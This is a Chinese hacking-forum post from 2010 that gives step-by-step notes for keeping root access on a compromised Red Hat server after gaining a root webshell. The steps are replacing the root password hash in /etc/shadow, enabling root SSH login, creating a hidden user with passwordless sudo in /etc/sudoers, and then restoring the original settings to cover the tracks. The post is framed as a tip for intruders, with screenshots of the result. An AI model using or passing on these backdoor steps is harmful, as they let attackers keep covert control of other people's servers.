D0000D发往论坛板块-------------------------------------------------------
No2  号板块  技术文章
D8888D贴子标题-------------------------------------------------------
linux提权笔记
D8888D主贴内容-------------------------------------------------------
 

没啥技术含量,一种思路，让某些得到root权限webshell的童鞋可以快点拿到权限。[img]http://www.t00ls.net/images/smilies/default/bq82.gif[/img]
某日拿到某站webshell，redhat 系统，Tomcat程序是root身份启动的，webshell当然也拥有root权限。
1.webshell直接替换root密码: /etc/shadow      // 记得备份
2.允许root通过ssh登陆: /etc/ssh/sshd_config 
   PermitRootLogin yes   #允许root登陆
3.重启ssh服务 service ssh restart
4.以root身份登陆ssh，增加一个用户
    useradd application
    passwd   // 根据提示设置密码
5.更改application用户运行su不需密码
   chmod +w /etc/sudoers    // 增加写入权限，默认只读
   修改/etc/sudoers
   vi /etc/sudoers
   加入application   ALL=(ALL)        NOPASSWD: ALL
6.把root密码修改回原样，禁止root登陆。并去除sudoers的写属性(chmod -w /etc/sudoers)。完工
最后，上图
root用户登陆:
[img]http://www.t00ls.net/images/default/attachimg.gif[/img]  [img]http://www.t00ls.net/attachments/month_1009/1009141249b5ab6357f4141435.jpg[/img][url=http://www.t00ls.net/attachment.php?aid=ODk2NXw0MGFiYzYwZXwxMjg2NDc4ODc0fGJmYzBiRi9FUzRGZ3ozd3NoZVJPcTk3YUlZekxmeEcyTzBNRzVjYVI3ZEUySHlR&nothumb=yes]链接标记下载[/url] (19.47 KB)

2010-9-14 12:49
普通用户登陆，su免密码进入root权限
[img]http://www.t00ls.net/images/default/attachimg.gif[/img]  [img]http://www.t00ls.net/attachments/month_1009/10091412492c7073c64d1b6396.jpg[/img][url=http://www.t00ls.net/attachment.php?aid=ODk2NnwxMThjZjE0ZnwxMjg2NDc4ODc0fGJmYzBiRi9FUzRGZ3ozd3NoZVJPcTk3YUlZekxmeEcyTzBNRzVjYVI3ZEUySHlR&nothumb=yes]链接标记下载[/url] (22.47 KB)

2010-9-14 12:49
